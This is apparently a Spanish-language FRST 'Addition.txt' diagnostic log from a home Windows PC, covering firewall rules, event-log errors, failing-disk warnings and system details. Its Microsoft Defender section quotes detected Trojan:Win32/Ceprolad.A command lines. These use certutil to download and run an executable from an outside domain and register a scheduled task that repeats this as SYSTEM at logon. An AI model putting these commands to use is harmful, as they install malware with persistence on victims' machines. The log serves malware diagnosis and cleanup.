[{A7EA4E35-5996-4608-8615-5C6DBBF85E83}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.153.608.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{6B85DDF0-77B5-4580-99D5-7D1AAC338AA9}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.153.608.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{0EA5C8AC-7378-4DB5-B82F-6231DE5938D3}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.153.608.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{C14B9AE8-8A86-42DC-B5A7-A07C16EB0F81}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.153.608.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{07AA4BF9-8E3B-4769-9EA5-FB235A849645}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.153.608.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{FF422392-7B8A-4134-8B5C-9DB70A3133C8}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.153.608.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{C2C61A9D-C5F9-4B5A-85B2-9520F7B5FA8F}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.153.608.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{23EC85AA-F38C-4F90-9846-3D4A8270FD35}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) FirewallRules: [{13E350CC-9D99-4A59-A19E-92D3B44A310D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) FirewallRules: [{F7C1994C-A642-495C-9D76-36B0376F8CC2}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) FirewallRules: [{ED433D1F-A66F-4A8A-B9B1-AA100386D9E2}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) FirewallRules: [TCP Query User{F81FCC73-ADAB-4D41-ACC1-74247BC835AA}C:\users\brandon\documents\office 2019 y activador (no borrar)\ejecutable\files\bin\kmss.exe] => (Allow) C:\users\brandon\documents\office 2019 y activador (no borrar)\ejecutable\files\bin\kmss.exe => Ningún archivo FirewallRules: [UDP Query User{F638B8B6-8DB5-475F-8DD7-808F873EEBD6}C:\users\brandon\documents\office 2019 y activador (no borrar)\ejecutable\files\bin\kmss.exe] => (Allow) C:\users\brandon\documents\office 2019 y activador (no borrar)\ejecutable\files\bin\kmss.exe => Ningún archivo FirewallRules: [TCP Query User{3F62004A-C9EE-4792-AE87-CBA4F9956184}C:\users\brandon\downloads\anydesk.exe] => (Allow) C:\users\brandon\downloads\anydesk.exe (philandro Software GmbH -> philandro Software GmbH) FirewallRules: [UDP Query User{E1B06824-3FFB-4CAB-98F4-F51C966E83D9}C:\users\brandon\downloads\anydesk.exe] => (Allow) C:\users\brandon\downloads\anydesk.exe (philandro Software GmbH -> philandro Software GmbH) FirewallRules: [TCP Query User{BB40B3A0-8D18-4C2C-B699-CFC66D21BF4D}C:\users\brandon\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\brandon\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) FirewallRules: [UDP Query User{C99A1C75-B0D7-4105-B249-DB32620F8260}C:\users\brandon\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\brandon\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) FirewallRules: [TCP Query User{1523B4AA-C5F9-41DE-8529-DCB0C10A9A61}C:\users\brandon\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\brandon\appdata\local\microsoft\teams\current\teams.exe => Ningún archivo FirewallRules: [UDP Query User{4E71E6B0-8A48-46EB-B97C-5B39ED961A9A}C:\users\brandon\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\brandon\appdata\local\microsoft\teams\current\teams.exe => Ningún archivo FirewallRules: [{6D6F6A13-5190-459E-8062-749C305E7DB5}] => (Allow) C:\Program Files\Genshin Impact\launcher.exe (miHoYo Co.,Ltd. -> miHoYo) FirewallRules: [{91C7223C-99D9-4531-9E16-B465FCB1C8DF}] => (Allow) C:\Program Files\Genshin Impact\launcher.exe (miHoYo Co.,Ltd. -> miHoYo) FirewallRules: [{7AF0CFAA-2272-4E33-B9BA-D2AFCC9355E4}] => (Allow) C:\Program Files\Genshin Impact\launcher.exe (miHoYo Co.,Ltd. -> miHoYo) FirewallRules: [{94F9A49D-315D-40EE-950D-A45C674B1E77}] => (Allow) C:\Program Files\Genshin Impact\launcher.exe (miHoYo Co.,Ltd. -> miHoYo) FirewallRules: [{7E5814E4-83AB-4B6A-B614-01BB9E849188}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [TCP Query User{FFC1DBED-957E-4AA8-8D10-8235D33E4B19}C:\users\brandon\desktop\juegos\your.amazing.t-gotchi\t-gotchi\t-gotchi-windows-mono\t-gotchi.exe] => (Block) C:\users\brandon\desktop\juegos\your.amazing.t-gotchi\t-gotchi\t-gotchi-windows-mono\t-gotchi.exe => Ningún archivo FirewallRules: [UDP Query User{2D45AAD4-CC1A-43FC-A6E4-9822B591C3FF}C:\users\brandon\desktop\juegos\your.amazing.t-gotchi\t-gotchi\t-gotchi-windows-mono\t-gotchi.exe] => (Block) C:\users\brandon\desktop\juegos\your.amazing.t-gotchi\t-gotchi\t-gotchi-windows-mono\t-gotchi.exe => Ningún archivo ==================== Puntos de Restauración ========================= ==================== Dispositivos defectuosos en el Administrador de dispositivos ============ ==================== Errores del registro de eventos: ======================== Errores de aplicación: ================== Error: (05/21/2021 04:53:14 PM) (Source: VSS) (EventID: 8194) (User: ) Description: Error del Servicio de instantáneas de volumen: error inesperado al consultar la interfaz IVssWriterCallback. HR = 0x80070005, Acceso denegado. . A menudo ocurre por una configuración de seguridad incorrecta en el proceso de escritura o de solicitud. Operación: Recopilando datos del escritor Contexto: Id. de clase del escritor: {e8132975-6f93-4464-a53e-1050253ae220} Nombre del escritor: System Writer Id. de instancia del escritor: {19531e25-a472-40d9-860e-833e15babd17} Error: (05/21/2021 03:45:00 PM) (Source: SideBySide) (EventID: 59) (User: ) Description: Error al generar el contexto de activación para "C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe". Error en el archivo de manifiesto o directiva "C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe.Config" en la línea 11. Sintaxis XML no válida. Error: (05/21/2021 03:38:27 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Error del Servicio de instantáneas de volumen: error inesperado al llamar a la rutina CoCreateInstance. HR = 0x8007045b, Se está cerrando el sistema. . Error: (05/21/2021 03:38:27 PM) (Source: VSS) (EventID: 13) (User: ) Description: Información del Servicio de instantáneas de volumen: el servidor COM con CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} y el nombre CEventSystem no puede iniciarse. [0x8007045b, Se está cerrando el sistema. ] Error: (05/21/2021 03:38:27 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Error del Servicio de instantáneas de volumen: error inesperado al llamar a la rutina CoCreateInstance. HR = 0x8007045b, Se está cerrando el sistema. . Error: (05/21/2021 03:38:27 PM) (Source: VSS) (EventID: 13) (User: ) Description: Información del Servicio de instantáneas de volumen: el servidor COM con CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} y el nombre CEventSystem no puede iniciarse. [0x8007045b, Se está cerrando el sistema. ] Error: (05/21/2021 03:08:00 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nombre de la aplicación con errores: mbamtray.exe, versión: 4.0.0.987, marca de tiempo: 0x60894603 Nombre del módulo con errores: Qt5Core.dll, versión: 5.14.1.0, marca de tiempo: 0x603971ce Código de excepción: 0xc0000005 Desplazamiento de errores: 0x0000000000219dc5 Identificador del proceso con errores: 0x376c Hora de inicio de la aplicación con errores: 0x01d74e80fc0a2fbc Ruta de acceso de la aplicación con errores: C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe Ruta de acceso del módulo con errores: C:\Program Files\Malwarebytes\Anti-Malware\Qt5Core.dll Identificador del informe: f88fd861-2885-417d-a4cf-931afe6562cd Nombre completo del paquete con errores: Identificador de aplicación relativa del paquete con errores: Error: (05/21/2021 01:12:15 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nombre de la aplicación con errores: SecHealthUI.exe, versión: 10.0.19041.662, marca de tiempo: 0x7e7ca492 Nombre del módulo con errores: ntdll.dll, versión: 10.0.19041.804, marca de tiempo: 0x4544b4a1 Código de excepción: 0xc0000374 Desplazamiento de errores: 0x00000000000ff099 Identificador del proceso con errores: 0x2234 Hora de inicio de la aplicación con errores: 0x01d74e736a44d3a3 Ruta de acceso de la aplicación con errores: C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe Ruta de acceso del módulo con errores: C:\WINDOWS\SYSTEM32\ntdll.dll Identificador del informe: 85e79927-5fd6-4fd6-8c7e-00b3c82db5dc Nombre completo del paquete con errores: Microsoft.Windows.SecHealthUI_10.0.19041.423_neutral__cw5n1h2txyewy Identificador de aplicación relativa del paquete con errores: SecHealthUI Errores del sistema: ============= Error: (05/21/2021 04:00:25 PM) (Source: disk) (EventID: 7) (User: ) Description: El dispositivo, \Device\Harddisk0\DR0, tiene un bloque defectuoso. Error: (05/21/2021 04:00:17 PM) (Source: disk) (EventID: 7) (User: ) Description: El dispositivo, \Device\Harddisk0\DR0, tiene un bloque defectuoso. Error: (05/21/2021 04:00:12 PM) (Source: disk) (EventID: 7) (User: ) Description: El dispositivo, \Device\Harddisk0\DR0, tiene un bloque defectuoso. Error: (05/21/2021 04:00:07 PM) (Source: disk) (EventID: 7) (User: ) Description: El dispositivo, \Device\Harddisk0\DR0, tiene un bloque defectuoso. Error: (05/21/2021 04:00:03 PM) (Source: disk) (EventID: 7) (User: ) Description: El dispositivo, \Device\Harddisk0\DR0, tiene un bloque defectuoso. Error: (05/21/2021 03:59:59 PM) (Source: disk) (EventID: 7) (User: ) Description: El dispositivo, \Device\Harddisk0\DR0, tiene un bloque defectuoso. Error: (05/21/2021 03:59:54 PM) (Source: disk) (EventID: 7) (User: ) Description: El dispositivo, \Device\Harddisk0\DR0, tiene un bloque defectuoso. Error: (05/21/2021 03:59:50 PM) (Source: disk) (EventID: 7) (User: ) Description: El dispositivo, \Device\Harddisk0\DR0, tiene un bloque defectuoso. Windows Defender: ================ Date: 2021-05-21 16:31:38 Description: Antivirus de Microsoft Defender detectó malware u otro software potencialmente no deseado. Para más información, consulta lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Nombre: Trojan:Win32/Ceprolad.A Id.: 2147726914 Gravedad: Grave Categoría: Caballo de Troya Ruta de acceso: CmdLine:_C:\Windows\System32\cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Brandon\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Brandon\AppData\Local\Temp\csrss\scheduled.exe /31340 Origen de detección: Desconocido Tipo de detección: Concreto Origen de detección: Sistema Usuario: NT AUTHORITY\SYSTEM Nombre de proceso: Unknown Versión de inteligencia de seguridad: AV: 1.339.1178.0, AS: 1.339.1178.0, NIS: 1.339.1178.0 Versión de motor: AM: 1.1.18100.6, NIS: 1.1.18100.6 Date: 2021-05-21 13:00:24 Description: Antivirus de Microsoft Defender detectó malware u otro software potencialmente no deseado. Para más información, consulta lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Nombre: Trojan:Win32/Ceprolad.A Id.: 2147726914 Gravedad: Grave Categoría: Caballo de Troya Ruta de acceso: CmdLine:_C:\Windows\System32\cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Brandon\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Brandon\AppData\Local\Temp\csrss\scheduled.exe /31340 Origen de detección: Desconocido Tipo de detección: Concreto Origen de detección: Sistema Usuario: NT AUTHORITY\SYSTEM Nombre de proceso: Unknown Versión de inteligencia de seguridad: AV: 1.339.1178.0, AS: 1.339.1178.0, NIS: 0.0.0.0 Versión de motor: AM: 1.1.18100.6, NIS: 0.0.0.0 Date: 2021-05-21 12:59:11 Description: Antivirus de Microsoft Defender detectó malware u otro software potencialmente no deseado. Para más información, consulta lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Nombre: Trojan:Win32/Ceprolad.A Id.: 2147726914 Gravedad: Grave Categoría: Caballo de Troya Ruta de acceso: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Brandon\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Brandon\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F Origen de detección: Desconocido Tipo de detección: Concreto Origen de detección: Sistema Usuario: NT AUTHORITY\SYSTEM Nombre de proceso: Unknown Versión de inteligencia de seguridad: AV: 1.339.1178.0, AS: 1.339.1178.0, NIS: 1.339.1178.0 Versión de motor: AM: 1.1.18100.6, NIS: 1.1.18100.6 Date: 2021-05-21 12:34:09 Description: Antivirus de Microsoft Defender detectó malware u otro software potencialmente no deseado. Para más información, consulta lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Nombre: Trojan:Win32/Ceprolad.A Id.: 2147726914 Gravedad: Grave Categoría: Caballo de Troya Ruta de acceso: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Brandon\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Brandon\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F Origen de detección: Desconocido Tipo de detección: Concreto Origen de detección: Sistema Usuario: NT AUTHORITY\SYSTEM Nombre de proceso: Unknown Versión de inteligencia de seguridad: AV: 1.339.1172.0, AS: 1.339.1172.0, NIS: 1.339.1172.0 Versión de motor: AM: 1.1.18100.6, NIS: 1.1.18100.6 Date: 2021-05-21 12:33:01 Description: Antivirus de Microsoft Defender detectó malware u otro software potencialmente no deseado. Para más información, consulta lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Nombre: Trojan:Win32/Ceprolad.A Id.: 2147726914 Gravedad: Grave Categoría: Caballo de Troya Ruta de acceso: CmdLine:_C:\Windows\System32\cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Brandon\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Brandon\AppData\Local\Temp\csrss\scheduled.exe /31340 Origen de detección: Desconocido Tipo de detección: Concreto Origen de detección: Sistema Usuario: NT AUTHORITY\SYSTEM Nombre de proceso: Unknown Versión de inteligencia de seguridad: AV: 1.339.1172.0, AS: 1.339.1172.0, NIS: 1.339.1172.0 Versión de motor: AM: 1.1.18100.6, NIS: 1.1.18100.6 Date: 2021-05-21 15:39:14 Description: Antivirus de Microsoft Defender encontró un error al intentar cargar la inteligencia de seguridad e intentará revertir a una versión que sepa que es correcta. Inteligencia de seguridad intentada: Copia de seguridad Código de error: 0x80004004 Descripción del error: Operación anulada Versión de inteligencia de seguridad: 1.339.1172.0;1.339.1172.0 Versión del motor: 1.1.18100.6 Date: 2021-05-21 15:39:11 Description: Antivirus de Microsoft Defender encontró un error al intentar cargar la inteligencia de seguridad e intentará revertir a una versión que sepa que es correcta. Inteligencia de seguridad intentada: Actual Código de error: 0x80004004 Descripción del error: Operación anulada Versión de inteligencia de seguridad: 1.339.1178.0;1.339.1178.0 Versión del motor: 1.1.18100.6 Date: 2021-05-20 17:25:21 Description: Antivirus de Microsoft Defender detectó un error al intentar actualizar la inteligencia de seguridad. Nueva versión de inteligencia de seguridad: Versión anterior de inteligencia de seguridad: 1.339.1121.0 Origen de actualización: Centro de protección contra malware de Microsoft Tipo de inteligencia de seguridad: AntiVirus Tipo de actualización: Completa Usuario: NT AUTHORITY\Servicio de red Versión actual del motor: Versión anterior del motor: 1.1.18100.6 Código de error: 0x80070102 Descripción del error: Tiempo de espera de la operación de espera agotado. Date: 2021-05-20 14:53:54 Description: Antivirus de Microsoft Defender detectó un error al intentar actualizar la inteligencia de seguridad. Nueva versión de inteligencia de seguridad: Versión anterior de inteligencia de seguridad: 1.339.1068.0 Origen de actualización: Centro de protección contra malware de Microsoft Tipo de inteligencia de seguridad: AntiVirus Tipo de actualización: Completa Usuario: NT AUTHORITY\Servicio de red Versión actual del motor: Versión anterior del motor: 1.1.18100.6 Código de error: 0x80070102 Descripción del error: Tiempo de espera de la operación de espera agotado. Date: 2021-05-18 10:04:20 Description: Antivirus de Microsoft Defender detectó un error al intentar actualizar la inteligencia de seguridad. Nueva versión de inteligencia de seguridad: Versión anterior de inteligencia de seguridad: 1.339.927.0 Origen de actualización: Centro de protección contra malware de Microsoft Tipo de inteligencia de seguridad: AntiVirus Tipo de actualización: Completa Usuario: NT AUTHORITY\Servicio de red Versión actual del motor: Versión anterior del motor: 1.1.18100.6 Código de error: 0x80070102 Descripción del error: Tiempo de espera de la operación de espera agotado. CodeIntegrity: =============== Date: 2021-03-30 14:25:48 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system. ==================== Información de la memoria =========================== BIOS: Dell Inc. 2.9.0 01/17/2019 Placa base: Dell Inc. 06XGXN Procesador: Intel(R) Core(TM) i3-7020U CPU @ 2.30GHz Porcentaje de memoria en uso: 86% RAM física total: 3961.88 MB RAM física disponible: 525.61 MB Virtual total: 10361.88 MB Virtual disponible: 4924.8 MB ==================== Unidades ================================ Drive c: (OS) (Fixed) (Total:916.22 GB) (Free:710.51 GB) NTFS \\?\Volume{2494be10-ccae-4e1b-ab73-297269be2b52}\ () (Fixed) (Total:0.97 GB) (Free:0.48 GB) NTFS \\?\Volume{f96c6265-ad18-4855-8f3d-2c52638dc901}\ (Image) (Fixed) (Total:12.42 GB) (Free:0.17 GB) NTFS \\?\Volume{79fdfad2-3d75-44a1-9b12-07c5f5d119ed}\ (DELLSUPPORT) (Fixed) (Total:1.15 GB) (Free:0.29 GB) NTFS \\?\Volume{e77656ac-e5d9-4f71-81da-e2713d615c77}\ (ESP) (Fixed) (Total:0.63 GB) (Free:0.57 GB) FAT32 ==================== MBR & Tabla de particiones ==================== ========================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: 82F6A099) Partition: GPT. ==================== Final de Addition.txt =======================